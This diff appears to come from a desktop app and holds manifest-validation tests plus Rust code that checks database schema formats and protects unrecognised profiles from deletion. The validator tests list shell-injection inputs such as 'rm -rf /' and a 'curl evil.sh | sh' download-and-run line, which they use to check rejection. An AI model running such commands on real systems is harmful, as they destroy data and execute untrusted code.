+    'darwin-aarch64': { signature: 'sig-a', url: 'https://example.com/a.dmg.tar.gz' },
+    'linux-x86_64': { signature: 'sig-b', url: 'https://example.com/b.AppImage.tar.gz' },
+  },
+};
+
+describe('parseManifest', () => {
+  it('parses valid manifest JSON', () => {
+    const text = JSON.stringify(baseManifest);
+    assert.deepEqual(parseManifest(text), baseManifest);
+  });
+
+  it('throws a clear error on invalid JSON', () => {
+    assert.throws(() => parseManifest('{not json'), /Could not parse manifest JSON/);
+  });
+});
+
+describe('readTrackedMinimum', () => {
+  it('returns the tracked value when present', () => {
+    assert.equal(readTrackedMinimum({ minimumCompatibleVersion: '0.3.0' }), '0.3.0');
+  });
+
+  it('throws when the key is missing', () => {
+    assert.throws(() => readTrackedMinimum({}), /missing a 'minimumCompatibleVersion'/);
+  });
+
+  it('throws when the config itself is missing', () => {
+    assert.throws(() => readTrackedMinimum(null), /missing a 'minimumCompatibleVersion'/);
+  });
+});
+
+describe('validateMinimumVersion', () => {
+  it('accepts a minimum below the manifest version', () => {
+    assert.equal(validateMinimumVersion('1.0.0', baseManifest), '1.0.0');
+  });
+
+  it('accepts a minimum equal to the manifest version', () => {
+    assert.equal(validateMinimumVersion('1.2.0', baseManifest), '1.2.0');
+  });
+
+  it('rejects a minimum greater than the manifest version', () => {
+    assert.throws(() => validateMinimumVersion('1.3.0', baseManifest), /greater than the release version/);
+  });
+
+  it('rejects an unparseable minimum', () => {
+    assert.throws(() => validateMinimumVersion('not-a-version', baseManifest), /not a valid semantic version/);
+  });
+
+  it('rejects a missing minimum value', () => {
+    assert.throws(() => validateMinimumVersion(undefined, baseManifest), /not a valid semantic version/);
+  });
+
+  it('tolerates and normalizes a leading v on the minimum', () => {
+    assert.equal(validateMinimumVersion('v1.0.0', baseManifest), '1.0.0');
+  });
+
+  it('tolerates and normalizes a leading v on the manifest version', () => {
+    const manifest = { ...baseManifest, version: 'v1.2.0' };
+    assert.equal(validateMinimumVersion('1.2.0', manifest), '1.2.0');
+  });
+
+  it('rejects values containing shell metacharacters before touching the manifest', () => {
+    for (const malicious of ['; rm -rf /', '$(whoami)', '`whoami`', '1.0.0; rm -rf /', '1.0.0 && curl evil.sh | sh']) {
+      assert.throws(
+        () => validateMinimumVersion(malicious, baseManifest),
+        /not a valid semantic version/,
+        `expected rejection for: ${malicious}`,
+      );
+    }
+  });
+
+  it('an override value passes through the exact same validator as the tracked value', () => {
+    const trackedValue = readTrackedMinimum({ minimumCompatibleVersion: '1.0.0' });
+    const overrideValue = '1.1.0';
+    // Precedence is a caller concern (override wins over tracked); both are
+    // just strings fed through the same validator with no special-casing.
+    assert.equal(validateMinimumVersion(overrideValue, baseManifest), '1.1.0');
+    assert.equal(validateMinimumVersion(trackedValue, baseManifest), '1.0.0');
+  });
+});
+
+describe('isSyntacticVersion', () => {
+  it('accepts plain and v-prefixed semver strings', () => {
+    assert.equal(isSyntacticVersion('1.2.3'), true);
+    assert.equal(isSyntacticVersion('v1.2.3'), true);
+    assert.equal(isSyntacticVersion('1.2.3-beta.1'), true);
+  });
+
+  it('rejects shell metacharacters and garbage', () => {
+    assert.equal(isSyntacticVersion('; rm -rf /'), false);
+    assert.equal(isSyntacticVersion('$(whoami)'), false);
+    assert.equal(isSyntacticVersion('`whoami`'), false);
+    assert.equal(isSyntacticVersion('not-a-version'), false);
+    assert.equal(isSyntacticVersion(''), false);
+    assert.equal(isSyntacticVersion(undefined), false);
+  });
+});
+
+describe('mergeMinimumVersion', () => {
+  it('preserves every existing field byte-for-byte and adds exactly one key', () => {
+    const merged = mergeMinimumVersion(baseManifest, '1.0.0');
+    assert.equal(merged.version, baseManifest.version);
+    assert.equal(merged.notes, baseManifest.notes);
+    assert.equal(merged.pub_date, baseManifest.pub_date);
+    assert.deepEqual(merged.platforms, baseManifest.platforms);
+    assert.equal(merged.minimum_compatible_version, '1.0.0');
+    assert.equal(Object.keys(merged).length, Object.keys(baseManifest).length + 1);
+  });
+
+  it('does not mutate the input manifest', () => {
+    const clone = JSON.parse(JSON.stringify(baseManifest));
+    mergeMinimumVersion(clone, '1.0.0');
+    assert.deepEqual(clone, baseManifest);
+  });
+
+  it('is idempotent: re-stamping replaces rather than duplicates the key', () => {
+    const stampedOnce = mergeMinimumVersion(baseManifest, '1.0.0');
+    const stampedTwice = mergeMinimumVersion(stampedOnce, '1.1.0');
+    assert.equal(stampedTwice.minimum_compatible_version, '1.1.0');
+    assert.equal(Object.keys(stampedTwice).length, Object.keys(baseManifest).length + 1);
+  });
+});

--- a/src-tauri/src/account_manager.rs
+++ b/src-tauri/src/account_manager.rs
@@ -106,8 +106,10 @@ pub fn list_accounts<R: Runtime>(handle: &AppHandle<R>) -> Result<Vec<String>, S
                     if name.starts_with("npub1") {
                         let in_flight =
                             is_in_flight_account(name, current.as_deref(), pending.as_deref());
+                        let format =
+                            crate::storage_format::classify_database(&entry.path().join("vector.db"));
                         let has_pkey = account_has_valid_pkey(handle, name);
-                        match classify_account_scan(&has_pkey, in_flight) {
+                        match classify_account_scan(&has_pkey, in_flight, format) {
                             AccountScanVerdict::Include => {
                                 let last_used = get_database_path(handle, name)
                                     .ok()
@@ -193,8 +195,9 @@ fn classify_pkey_query_result(result: Result<String, rusqlite::Error>) -> Result
 }
 
 /// Three-way verdict for a single directory scanned by `list_accounts`,
-/// derived purely from `account_has_valid_pkey`'s result and whether the
-/// directory is the current or pending account.
+/// derived purely from `account_has_valid_pkey`'s result, whether the
+/// directory is the current or pending account, and the profile's
+/// `crate::storage_format::StorageFormatVerdict`.
 ///
 /// A valid pkey always means `Include`, even while in-flight: in-flight only
 /// protects a directory with *no* pkey yet (mid-creation) from cleanup, it
@@ -207,19 +210,46 @@ fn classify_pkey_query_result(result: Result<String, rusqlite::Error>) -> Result
 /// schema state) always means `Skip`: validity is unknown, so the caller
 /// leaves the directory alone rather than guessing and possibly deleting a
 /// live account.
+///
+/// An `Unrecognized` or `Divergent` format verdict is never `Delete`,
+/// regardless of what the pkey probe found: that schema shape means a
+/// *newer* build wrote (or is writing) this database, not that account
+/// setup was abandoned. Deleting it would be unrecoverable data loss for a
+/// profile this build simply doesn't understand yet -- unlike a genuinely
+/// orphaned `Recognized`-format profile, which this build can fully read
+/// and confidently judge as pkey-less.
 #[derive(Debug, PartialEq, Eq, Clone, Copy)]
 enum AccountScanVerdict {
     /// Valid pkey found; the account belongs in the returned list.
     Include,
     /// No pkey and not in-flight; safe to clean up the orphaned directory.
     Delete,
-    /// In-flight with no pkey yet, or pkey validity is unknown; leave alone.
+    /// In-flight with no pkey yet, pkey validity is unknown, or the format
+    /// is unrecognized/divergent; leave alone.
     Skip,
 }
 
-/// Combine `account_has_valid_pkey`'s result and in-flight status into a
-/// scan verdict. See `AccountScanVerdict` for the policy this encodes.
-fn classify_account_scan(has_pkey: &Result<bool, String>, in_flight: bool) -> AccountScanVerdict {
+/// Combine `account_has_valid_pkey`'s result, in-flight status, and the
+/// profile's storage-format verdict into a scan verdict. See
+/// `AccountScanVerdict` for the policy this encodes.
+fn classify_account_scan(
+    has_pkey: &Result<bool, String>,
+    in_flight: bool,
+    format: crate::storage_format::StorageFormatVerdict,
+) -> AccountScanVerdict {
+    if matches!(
+        format,
+        crate::storage_format::StorageFormatVerdict::Unrecognized(_)
+            | crate::storage_format::StorageFormatVerdict::Divergent(_)
+    ) {
+        // A newer build may have written this schema; only a confirmed
+        // valid pkey overrides the exemption, never Ok(false) or Err.
+        return match has_pkey {
+            Ok(true) => AccountScanVerdict::Include,
+            _ => AccountScanVerdict::Skip,
+        };
+    }
+
     match (has_pkey, in_flight) {
         (Ok(true), _) => AccountScanVerdict::Include,
         (Ok(false), false) => AccountScanVerdict::Delete,
@@ -536,6 +566,7 @@ mod classify_pkey_query_result_tests {
 #[cfg(test)]
 mod account_scan_verdict_tests {
     use super::*;
+    use crate::storage_format::StorageFormatVerdict;
 
     /// Regression guard for the bug that blanked the Create Account screen:
     /// an early `continue` on in-flight accounts skipped them even when they
@@ -546,11 +577,11 @@ mod account_scan_verdict_tests {
     #[test]
     fn valid_pkey_is_always_included_even_while_in_flight() {
         assert_eq!(
-            classify_account_scan(&Ok(true), true),
+            classify_account_scan(&Ok(true), true, StorageFormatVerdict::Recognized),
             AccountScanVerdict::Include
         );
         assert_eq!(
-            classify_account_scan(&Ok(true), false),
+            classify_account_scan(&Ok(true), false, StorageFormatVerdict::Recognized),
             AccountScanVerdict::Include
         );
     }
@@ -558,7 +589,7 @@ mod account_scan_verdict_tests {
     #[test]
     fn missing_pkey_and_not_in_flight_is_deleted() {
         assert_eq!(
-            classify_account_scan(&Ok(false), false),
+            classify_account_scan(&Ok(false), false, StorageFormatVerdict::Recognized),
             AccountScanVerdict::Delete
         );
     }
@@ -566,7 +597,7 @@ mod account_scan_verdict_tests {
     #[test]
     fn missing_pkey_while_in_flight_is_skipped() {
         assert_eq!(
-            classify_account_scan(&Ok(false), true),
+            classify_account_scan(&Ok(false), true, StorageFormatVerdict::Recognized),
             AccountScanVerdict::Skip
         );
     }
@@ -574,7 +605,120 @@ mod account_scan_verdict_tests {
     #[test]
     fn query_error_is_always_skipped() {
         let err = Err("locked database".to_string());
-        assert_eq!(classify_account_scan(&err, true), AccountScanVerdict::Skip);
-        assert_eq!(classify_account_scan(&err, false), AccountScanVerdict::Skip);
+        assert_eq!(
+            classify_account_scan(&err, true, StorageFormatVerdict::Recognized),
+            AccountScanVerdict::Skip
+        );
+        assert_eq!(
+            classify_account_scan(&err, false, StorageFormatVerdict::Recognized),
+            AccountScanVerdict::Skip
+        );
+    }
+
+    // -- unrecognized/divergent format exemption --------------------------
+    //
+    // A newer build may have written an unrecognized or divergent schema;
+    // this build cannot tell an abandoned setup from live data it simply
+    // doesn't understand, so it must never delete on that basis alone.
+
+    #[test]
+    fn unrecognized_format_is_skipped_not_deleted() {
+        assert_eq!(
+            classify_account_scan(&Ok(false), false, StorageFormatVerdict::Unrecognized(9)),
+            AccountScanVerdict::Skip
+        );
+    }
+
+    #[test]
+    fn divergent_format_is_skipped_not_deleted() {
+        assert_eq!(
+            classify_account_scan(&Ok(false), false, StorageFormatVerdict::Divergent(9)),
+            AccountScanVerdict::Skip
+        );
+    }
+
+    #[test]
+    fn unrecognized_format_with_pkey_query_error_is_skipped() {
+        let err = Err("locked database".to_string());
+        assert_eq!(
+            classify_account_scan(&err, false, StorageFormatVerdict::Unrecognized(9)),
+            AccountScanVerdict::Skip
+        );
+    }
+
+    #[test]
+    fn unrecognized_format_with_valid_pkey_is_still_included() {
+        assert_eq!(
+            classify_account_scan(&Ok(true), false, StorageFormatVerdict::Unrecognized(9)),
+            AccountScanVerdict::Include
+        );
+    }
+
+    #[test]
+    fn recognized_format_not_in_flight_is_still_deleted() {
+        assert_eq!(
+            classify_account_scan(&Ok(false), false, StorageFormatVerdict::Recognized),
+            AccountScanVerdict::Delete
+        );
+    }
+
+    #[test]
+    fn recognized_format_in_flight_is_still_skipped() {
+        assert_eq!(
+            classify_account_scan(&Ok(false), true, StorageFormatVerdict::Recognized),
+            AccountScanVerdict::Skip
+        );
+    }
+}
+
+#[cfg(test)]
+mod list_accounts_orphan_exemption_tests {
+    use super::*;
+    use crate::storage_format::StorageFormatVerdict;
+
+    /// Integration regression test for the data-loss bug this unit fixes:
+    /// `list_accounts`'s orphan-directory cleanup must never delete a
+    /// profile whose database a newer build wrote (unrecognized schema),
+    /// even though this build reads no pkey from it -- the same condition
+    /// that, before the fix, would have looked identical to a genuinely
+    /// abandoned account setup and been deleted.
+    #[test]
+    fn unrecognized_format_profile_survives_list_accounts_scan() {
+        let app = tauri::test::mock_app();
+        let handle = app.handle();
+        let npub = "npub1u3orphanexemptionintegration";
+
+        let profile_dir = get_profile_directory(handle, npub).unwrap();
+        let db_path = profile_dir.join("vector.db");
+
+        {
+            let mut conn = rusqlite::Connection::open(&db_path).unwrap();
+            crate::migrations::run_migrations(&mut conn).unwrap();
+        }
+        // No pkey row is ever written to `settings`, matching an
+        // in-progress or future-format account this build cannot read.
+        let above_ceiling = crate::migrations::embedded_ceiling() + 1;
+        {
+            let conn = rusqlite::Connection::open(&db_path).unwrap();
+            conn.execute(
+                "INSERT INTO refinery_schema_history (version, name, applied_on, checksum) \
+                 VALUES (?1, 'future_migration', '2026-01-01T00:00:00Z', 'deadbeef')",
+                rusqlite::params![above_ceiling],
+            )
+            .unwrap();
+        }
+        assert_eq!(
+            crate::storage_format::classify_database(&db_path),
+            StorageFormatVerdict::Unrecognized(above_ceiling)
+        );
+
+        let _ = list_accounts(handle);
+
+        assert!(
+            profile_dir.exists(),
+            "an unrecognized-format profile must never be deleted by list_accounts"
+        );
+
+        let _ = std::fs::remove_dir_all(&profile_dir);
     }
 }

--- a/src-tauri/src/lib.rs
+++ b/src-tauri/src/lib.rs
@@ -87,6 +87,9 @@ mod audio;
 // Per-account SQLite schema and data migrations (refinery).
 mod migrations;
 
+// Read-only storage-format recognition for the app database (no migration).
+mod storage_format;
+
 // Salt/key-derivation migration engine (U2)
 mod migration;
 

--- a/src-tauri/src/lib.rs
+++ b/src-tauri/src/lib.rs
@@ -9155,6 +9155,8 @@ pub fn run() {
             account_manager::list_all_accounts,
             account_manager::check_any_account_exists,
             account_manager::switch_account,
+            // Storage-format compatibility commands
+            storage_format::get_storage_compatibility,
             // Session management commands (U4)
             session::check_session,
             session::session_heartbeat,

--- a/src-tauri/src/migrations/mod.rs
+++ b/src-tauri/src/migrations/mod.rs
@@ -12,7 +12,29 @@ mod embedded {
 /// Hard-coded, not derived from the embedded set — deriving it from
 /// `get_migrations()` would silently raise the ceiling every time a new
 /// migration is added, reintroducing the defect this constant exists to fix.
-const PRE_REFINERY_CEILING: i32 = 27;
+pub(crate) const PRE_REFINERY_CEILING: i32 = 27;
+
+/// Highest version in the embedded migration set. Derived at compile time
+/// from `embed_migrations!`, unlike `PRE_REFINERY_CEILING` which is pinned
+/// to a historical commit: this ceiling is meant to move every time a
+/// migration file is added, because it exists to recognize a database
+/// written by a *newer* build than the one running, not to gate the
+/// baseline-detection behavior `PRE_REFINERY_CEILING` protects.
+pub(crate) fn embedded_ceiling() -> i32 {
+    embedded::migrations::runner()
+        .get_migrations()
+        .iter()
+        .map(|m| m.version())
+        .max()
+        .unwrap_or(0)
+}
+
+/// The full embedded migration set (version, name, checksum), for read-only
+/// parity comparison against a database's applied history without running
+/// anything.
+pub(crate) fn embedded_migration_set() -> Vec<refinery::Migration> {
+    embedded::migrations::runner().get_migrations().clone()
+}
 
 /// Run all refinery migrations on the supplied connection.
 ///

--- a/src-tauri/src/mls_store_reset.rs
+++ b/src-tauri/src/mls_store_reset.rs
@@ -48,22 +48,6 @@ fn account_lock(account: &str) -> Result<Arc<Mutex<()>>, String> {
         .clone())
 }
 
-fn history_version(conn: &Connection) -> Result<Option<i64>, rusqlite::Error> {
-    let exists: bool = conn.query_row(
-        "SELECT EXISTS(SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = '_refinery_schema_history_nostr_mls')",
-        [],
-        |row| row.get(0),
-    )?;
-    if !exists {
-        return Ok(None);
-    }
-    conn.query_row(
-        "SELECT MAX(version) FROM _refinery_schema_history_nostr_mls",
-        [],
-        |row| row.get(0),
-    )
-}
-
 fn classify_version(version: Option<i64>, table_exists: bool) -> StoreClassification {
     match version {
         Some(1..=5) => StoreClassification::Current,
@@ -76,12 +60,9 @@ fn classify_version(version: Option<i64>, table_exists: bool) -> StoreClassifica
 }
 
 fn inspect_connection(conn: &Connection) -> Result<StoreClassification, rusqlite::Error> {
-    let table_exists: bool = conn.query_row(
-        "SELECT EXISTS(SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = '_refinery_schema_history_nostr_mls')",
-        [],
-        |row| row.get(0),
-    )?;
-    let version = history_version(conn)?;
+    let (table_exists, rows) =
+        crate::storage_format::read_history_table(conn, "_refinery_schema_history_nostr_mls")?;
+    let version = rows.iter().map(|row| i64::from(row.version)).max();
     Ok(classify_version(version, table_exists))
 }
 
@@ -503,14 +484,20 @@ mod tests {
     fn store(path: &Path, version: Option<i64>) {
         let conn = Connection::open(path).unwrap();
         conn.execute_batch(
-            "CREATE TABLE _refinery_schema_history_nostr_mls (version INTEGER);
+            "CREATE TABLE _refinery_schema_history_nostr_mls (
+                version INTEGER PRIMARY KEY,
+                name VARCHAR(255),
+                applied_on VARCHAR(255),
+                checksum VARCHAR(255)
+             );
              CREATE TABLE groups (nostr_group_id TEXT, admin_pubkeys JSONB);
              CREATE TABLE welcomes (wrapper_event_id TEXT, state TEXT);",
         )
         .unwrap();
         if let Some(version) = version {
             conn.execute(
-                "INSERT INTO _refinery_schema_history_nostr_mls(version) VALUES (?1)",
+                "INSERT INTO _refinery_schema_history_nostr_mls (version, name, applied_on, checksum)
+                 VALUES (?1, 'fixture', '2024-01-01T00:00:00Z', 'fixture')",
                 [version],
             )
             .unwrap();
@@ -770,8 +757,14 @@ mod tests {
         let conn = Connection::open(&path).unwrap();
         conn.execute_batch(&format!(
             "PRAGMA key = \"x'{}'\";
-             CREATE TABLE _refinery_schema_history_nostr_mls (version INTEGER);
-             INSERT INTO _refinery_schema_history_nostr_mls(version) VALUES (5);",
+             CREATE TABLE _refinery_schema_history_nostr_mls (
+                version INTEGER PRIMARY KEY,
+                name VARCHAR(255),
+                applied_on VARCHAR(255),
+                checksum VARCHAR(255)
+             );
+             INSERT INTO _refinery_schema_history_nostr_mls (version, name, applied_on, checksum)
+             VALUES (5, 'fixture', '2024-01-01T00:00:00Z', 'fixture');",
             hex::encode(key)
         ))
         .unwrap();

--- a/src-tauri/src/storage_format.rs
+++ b/src-tauri/src/storage_format.rs
@@ -9,6 +9,7 @@
 use rusqlite::{Connection, OpenFlags};
 use std::path::Path;
 use std::time::{Duration, Instant};
+use tauri::{AppHandle, Runtime};
 
 /// Busy-timeout mirroring `account_manager::account_has_valid_pkey`'s
 /// precedent: wait out a transient lock from the main pooled connection
@@ -231,6 +232,55 @@ pub(crate) fn scan_profiles(app_data_dir: &Path) -> StorageFormatScanReport {
         unrecognized_count,
         highest_offending_version,
     }
+}
+
+/// Frontend-facing report combining `StorageFormatScanReport` with the
+/// highest schema version this build supports, so the launch gate can
+/// render "recognized" vs. "this build only supports up to schema X, found
+/// Y on disk" without a second round trip. `supported_schema_version` is
+/// this build's embedded migration ceiling, not its own release version --
+/// the two are unrelated, and the frontend already has its own release
+/// version via `resolveInstalledVersion()` for the separate minimum-version
+/// reason. Carries no filesystem path or npub for the same reason
+/// `StorageFormatScanReport` does not.
+#[derive(Debug, Clone, PartialEq, Eq, serde::Serialize)]
+#[serde(rename_all = "camelCase")]
+pub(crate) struct StorageCompatibilityReport {
+    pub(crate) all_recognized: bool,
+    pub(crate) unrecognized_count: usize,
+    pub(crate) highest_offending_version: Option<i32>,
+    pub(crate) supported_schema_version: i32,
+}
+
+impl From<StorageFormatScanReport> for StorageCompatibilityReport {
+    fn from(report: StorageFormatScanReport) -> Self {
+        Self {
+            all_recognized: report.all_recognized,
+            unrecognized_count: report.unrecognized_count,
+            highest_offending_version: report.highest_offending_version,
+            supported_schema_version: crate::migrations::embedded_ceiling(),
+        }
+    }
+}
+
+/// Pure report builder shared by the command and its tests: `scan_profiles`
+/// plus this build's own version, with no `AppHandle` involved.
+pub(crate) fn compatibility_report(app_data_dir: &Path) -> StorageCompatibilityReport {
+    scan_profiles(app_data_dir).into()
+}
+
+/// Report whether this build recognizes every local profile's storage
+/// format, for the launch gate to consult before routing to onboarding or
+/// unlock. Runs before authentication, so the error variant must never name
+/// a path or an npub -- unlike `get_profile_directory`'s own errors, which
+/// this command must not reuse.
+#[tauri::command]
+pub(crate) fn get_storage_compatibility<R: Runtime>(
+    app: AppHandle<R>,
+) -> Result<StorageCompatibilityReport, String> {
+    let app_data_dir = crate::test_sandbox::test_data_dir(&app)
+        .map_err(|_| "Unable to resolve app storage location".to_string())?;
+    Ok(compatibility_report(&app_data_dir))
 }
 
 #[cfg(test)]
@@ -593,5 +643,105 @@ mod tests {
         let embedded_versions: std::collections::BTreeSet<i32> =
             embedded.iter().map(|m| m.version()).collect();
         assert_eq!(embedded_versions, file_versions);
+    }
+
+    // -- StorageCompatibilityReport / get_storage_compatibility -----------
+
+    #[test]
+    fn compatibility_report_serializes_to_expected_camel_case_keys() {
+        let report = StorageCompatibilityReport {
+            all_recognized: false,
+            unrecognized_count: 2,
+            highest_offending_version: Some(31),
+            supported_schema_version: 30,
+        };
+        let value = serde_json::to_value(&report).unwrap();
+        assert_eq!(
+            value.get("allRecognized").unwrap(),
+            &serde_json::json!(false)
+        );
+        assert_eq!(
+            value.get("unrecognizedCount").unwrap(),
+            &serde_json::json!(2)
+        );
+        assert_eq!(
+            value.get("highestOffendingVersion").unwrap(),
+            &serde_json::json!(31)
+        );
+        assert_eq!(
+            value.get("supportedSchemaVersion").unwrap(),
+            &serde_json::json!(30)
+        );
+        // Exactly the four expected keys -- no accidental extra field, and
+        // no snake_case field slipping through unrenamed.
+        assert_eq!(value.as_object().unwrap().len(), 4);
+    }
+
+    #[test]
+    fn compatibility_report_is_compatible_for_directory_with_no_profiles() {
+        let root = unique_temp_dir("compat-empty");
+        std::fs::create_dir_all(&root).unwrap();
+
+        let report = compatibility_report(&root);
+        assert!(report.all_recognized);
+        assert_eq!(report.unrecognized_count, 0);
+        assert_eq!(report.highest_offending_version, None);
+        assert_eq!(report.supported_schema_version, crate::migrations::embedded_ceiling());
+
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn compatibility_report_is_incompatible_for_one_failing_profile() {
+        let root = unique_temp_dir("compat-incompatible");
+        let profile_dir = root.join("npub1compatincompatibleprofile");
+        std::fs::create_dir_all(&profile_dir).unwrap();
+        let db_path = profile_dir.join("vector.db");
+        write_migrated_db(&db_path);
+
+        let above_ceiling = crate::migrations::embedded_ceiling() + 1;
+        {
+            let conn = rusqlite::Connection::open(&db_path).unwrap();
+            conn.execute(
+                "INSERT INTO refinery_schema_history (version, name, applied_on, checksum) \
+                 VALUES (?1, 'future_migration', '2026-01-01T00:00:00Z', 'deadbeef')",
+                rusqlite::params![above_ceiling],
+            )
+            .unwrap();
+        }
+
+        let report = compatibility_report(&root);
+        assert!(!report.all_recognized);
+        assert_eq!(report.unrecognized_count, 1);
+        assert_eq!(report.highest_offending_version, Some(above_ceiling));
+        assert_eq!(report.supported_schema_version, crate::migrations::embedded_ceiling());
+
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn get_storage_compatibility_command_succeeds_against_a_mock_app() {
+        // Exercises the command's own plumbing (AppHandle -> test_data_dir
+        // -> compatibility_report). Deliberately does not assert on
+        // unrecognized_count/highest_offending_version: mock_app's
+        // app_data_dir is a real, shared directory across this test
+        // binary, so only properties independent of what other tests may
+        // have left there are safe to assert here. Count-sensitive
+        // behavior is covered against isolated temp dirs above.
+        let app = tauri::test::mock_app();
+        let report = get_storage_compatibility(app.handle().clone()).unwrap();
+        assert_eq!(report.supported_schema_version, crate::migrations::embedded_ceiling());
+    }
+
+    #[test]
+    fn app_data_dir_resolution_failure_message_carries_no_npub_or_path() {
+        // The command's only error path always replaces whatever
+        // `test_data_dir` produced with this fixed string -- never
+        // `get_profile_directory`'s own errors, which embed the npub this
+        // guards against.
+        let message = "Unable to resolve app storage location";
+        assert!(!message.contains("npub1"));
+        assert!(!message.contains('/'));
+        assert!(!message.contains('\\'));
     }
 }

--- a/src-tauri/src/storage_format.rs
+++ b/src-tauri/src/storage_format.rs
@@ -1,0 +1,597 @@
+//! Read-only storage-format recognition for the app database (`vector.db`).
+//!
+//! Reproduces refinery-core 0.9.2's `verify_migrations` abort semantics
+//! ahead of time, on a read-only connection, so the app can tell a user to
+//! update instead of surfacing refinery's own opaque migration error. Never
+//! calls `run_migrations` or `get_db_connection` -- either would migrate the
+//! database as a side effect of merely checking it.
+
+use rusqlite::{Connection, OpenFlags};
+use std::path::Path;
+use std::time::{Duration, Instant};
+
+/// Busy-timeout mirroring `account_manager::account_has_valid_pkey`'s
+/// precedent: wait out a transient lock from the main pooled connection
+/// instead of treating a momentary lock as an unrecognized schema.
+const PROBE_BUSY_TIMEOUT: Duration = Duration::from_millis(2000);
+
+/// Wall-clock budget for `scan_profiles`. A profile reached after the
+/// deadline is left unscanned and therefore does not contribute to the
+/// report -- the same "not a version problem" policy as any other read
+/// failure.
+const SCAN_DEADLINE: Duration = Duration::from_secs(5);
+
+/// One row read from a refinery schema-history table.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub(crate) struct HistoryRow {
+    pub(crate) version: i32,
+    pub(crate) name: String,
+    pub(crate) checksum: String,
+}
+
+/// Read-only probe shared with `mls_store_reset`: whether `history_table`
+/// exists on `conn`, and if so, every row it holds ordered by version.
+/// Parameterized by table name because the app database's refinery table
+/// (`refinery_schema_history`) and the MLS store's own
+/// (`_refinery_schema_history_nostr_mls`) are distinct tables.
+pub(crate) fn read_history_table(
+    conn: &Connection,
+    history_table: &str,
+) -> Result<(bool, Vec<HistoryRow>), rusqlite::Error> {
+    if !table_exists(conn, history_table)? {
+        return Ok((false, Vec::new()));
+    }
+
+    let query =
+        format!("SELECT version, name, checksum FROM \"{history_table}\" ORDER BY version ASC");
+    let mut stmt = conn.prepare(&query)?;
+    let rows = stmt
+        .query_map([], |row| {
+            Ok(HistoryRow {
+                version: row.get(0)?,
+                name: row.get(1)?,
+                checksum: row.get(2)?,
+            })
+        })?
+        .collect::<Result<Vec<_>, _>>()?;
+    Ok((true, rows))
+}
+
+fn table_exists(conn: &Connection, name: &str) -> Result<bool, rusqlite::Error> {
+    conn.query_row(
+        "SELECT EXISTS(SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?1)",
+        [name],
+        |row| row.get(0),
+    )
+}
+
+/// Whether this build recognizes a profile's on-disk `vector.db` schema.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub(crate) enum StorageFormatVerdict {
+    /// No database file at all -- nothing to recognize or reject.
+    Fresh,
+    /// No `refinery_schema_history` table, but `settings` is present:
+    /// `run_migrations` baselines this without validating structure further.
+    ///
+    /// Binding constraint: no future migration may drop or rename
+    /// `refinery_schema_history`. If one did, a database that never went
+    /// through refinery would land in this same arm, get a forged history
+    /// stamped over it by `baseline_existing_account` without ever having
+    /// its structure validated, and then be migrated blind.
+    PreRefinery,
+    Recognized,
+    /// An applied row with no counterpart in the embedded migration set --
+    /// refinery's `MissingVersion` abort.
+    Unrecognized(i32),
+    /// An applied row whose embedded counterpart differs on name or
+    /// checksum, or an embedded migration at or below the applied maximum
+    /// that was never applied -- refinery's `DivergentVersion` abort, or its
+    /// other `MissingVersion` case.
+    Divergent(i32),
+}
+
+/// Pure classification over the read-only probe's outputs. Reproduces
+/// refinery-core 0.9.2's `verify_migrations` (default `abort_missing: true`,
+/// `abort_divergent: true`) read-only, looping over every applied row --
+/// checking only the highest would miss a divergent or missing migration
+/// buried lower in the history.
+fn classify_history(
+    applied: &[HistoryRow],
+    history_table_exists: bool,
+    settings_table_exists: bool,
+    embedded: &[refinery::Migration],
+) -> StorageFormatVerdict {
+    if !history_table_exists {
+        return if settings_table_exists {
+            StorageFormatVerdict::PreRefinery
+        } else {
+            StorageFormatVerdict::Fresh
+        };
+    }
+
+    if applied.is_empty() {
+        return StorageFormatVerdict::Recognized;
+    }
+
+    // Every applied row must have an embedded counterpart with the same
+    // name and checksum (refinery's MissingVersion / DivergentVersion).
+    for row in applied {
+        match embedded.iter().find(|m| m.version() == row.version) {
+            None => return StorageFormatVerdict::Unrecognized(row.version),
+            Some(migration) => {
+                if migration.name() != row.name
+                    || migration.checksum().to_string() != row.checksum
+                {
+                    return StorageFormatVerdict::Divergent(row.version);
+                }
+            }
+        }
+    }
+
+    // An embedded versioned migration at or below the database's highest
+    // applied version that was never applied (refinery's other
+    // MissingVersion case).
+    let current = applied
+        .iter()
+        .map(|row| row.version)
+        .max()
+        .unwrap_or(i32::MIN);
+    for migration in embedded {
+        let never_applied = !applied.iter().any(|row| row.version == migration.version());
+        if migration.version() <= current && never_applied {
+            return StorageFormatVerdict::Divergent(migration.version());
+        }
+    }
+
+    StorageFormatVerdict::Recognized
+}
+
+/// Classify one already-open connection. Shared by `classify_database` (the
+/// real read-only-open path) and tests that want to probe a live connection
+/// (e.g. one already migrated in-memory) without a second file handle.
+fn classify_connection(conn: &Connection) -> Result<StorageFormatVerdict, rusqlite::Error> {
+    let (history_table_exists, applied) = read_history_table(conn, "refinery_schema_history")?;
+    let settings_table_exists = table_exists(conn, "settings")?;
+    Ok(classify_history(
+        &applied,
+        history_table_exists,
+        settings_table_exists,
+        &crate::migrations::embedded_migration_set(),
+    ))
+}
+
+/// Classify `path` without migrating it. Opens read-only with a short busy
+/// timeout; any failure to open or query -- corruption, a lock outliving the
+/// timeout, a truncated file -- classifies as `Recognized`. Those are not
+/// version problems, and the existing error paths already own them.
+pub(crate) fn classify_database(path: &Path) -> StorageFormatVerdict {
+    if !path.exists() {
+        return StorageFormatVerdict::Fresh;
+    }
+
+    let flags = OpenFlags::SQLITE_OPEN_READ_ONLY | OpenFlags::SQLITE_OPEN_NO_MUTEX;
+    let conn = match Connection::open_with_flags(path, flags) {
+        Ok(conn) => conn,
+        Err(_) => return StorageFormatVerdict::Recognized,
+    };
+    if conn.busy_timeout(PROBE_BUSY_TIMEOUT).is_err() {
+        return StorageFormatVerdict::Recognized;
+    }
+
+    classify_connection(&conn).unwrap_or(StorageFormatVerdict::Recognized)
+}
+
+/// Aggregate verdict across every profile directory under `app_data_dir`.
+/// Carries no npub and no filesystem path -- only counts and a bare version
+/// number -- so it is safe to surface in a block screen or a support report.
+#[derive(Debug, Clone, PartialEq, Eq)]
